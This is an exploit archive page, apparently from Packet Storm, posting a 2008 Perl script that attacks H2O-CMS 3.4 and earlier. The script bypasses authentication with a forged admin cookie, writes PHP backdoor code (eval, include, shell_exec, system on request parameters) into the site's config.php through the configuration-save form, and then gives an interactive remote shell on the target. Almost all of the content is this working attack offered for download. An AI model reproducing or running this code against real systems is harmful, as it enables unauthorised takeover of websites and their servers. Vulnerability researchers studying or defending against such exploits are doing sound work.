exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

h2ocms-exec.txt

h2ocms-exec.txt
Posted Oct 28, 2008
Authored by StAkeR

H2O-CMS versions 3.4 and below remote command execution exploit that uses config.php.

tags | exploit, remote, php
SHA-256 | 476f162a875f46a265df73afb9f9ad40f4d636430039866c4a52d5c2d0e750d2

h2ocms-exec.txt

Change Mirror Download
#!/usr/bin/perl 
# ----------------------------------------------------------
# H2O-CMS <= 3.4 Remote Command Execution Exploit (mq = Off)
# Discovered By StAkeR[at]hotmail[dot]it
# Download On http://sourceforge.net/projects/h2o-cms
# ----------------------------------------------------------

use strict;
use LWP::UserAgent;
use LWP::Simple;

my $post;
my $sysc;
my $host = shift or athos();
my $auth = "user=admin&id=1&admin=1";
my $http = new LWP::UserAgent;

my $write = {
'site_title' => '";""; error_reporting(0); echo"//athos"; "',
'db_server' => '";""; include($_REQUEST["i"]); "',
'db_name' => '";""; eval($_REQUEST["g"]); "',
'db_username' => '";""; echo shell_exec($_REQUEST["c"]); "',
'db_password' => '";""; echo system($_REQUEST["s"]); "',
'save' => 'Save',
};


$http->default_header('Cookie' => $auth);
$post = $http->post($host.'/index.php?option=SaveConfig',$write);


sub start_exec
{
my $site = shift @_;
my $exec = shift @_;
my $view = get($site.'/includes/config.php?c='.$exec);

return $view;
}

sub athos
{
print STDOUT "# Usage: perl $0 http://[host]\n";
print STDOUT "# Remote Command Execution Exploit\n";
exit;
}

unless(get($host) =~ /\/\/athos/i)
{
print STDOUT "# Exploit Failed!\n";
exit;
}
else
{
while(1)
{
if(defined start_exec($host,$sysc))
{
print STDOUT "[athos-shell] ~# ";
chomp($sysc = <STDIN>);

print STDOUT "[athos-shell] ~# ".start_exec($host,$sysc)."\n";
}
}
}

__END__


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close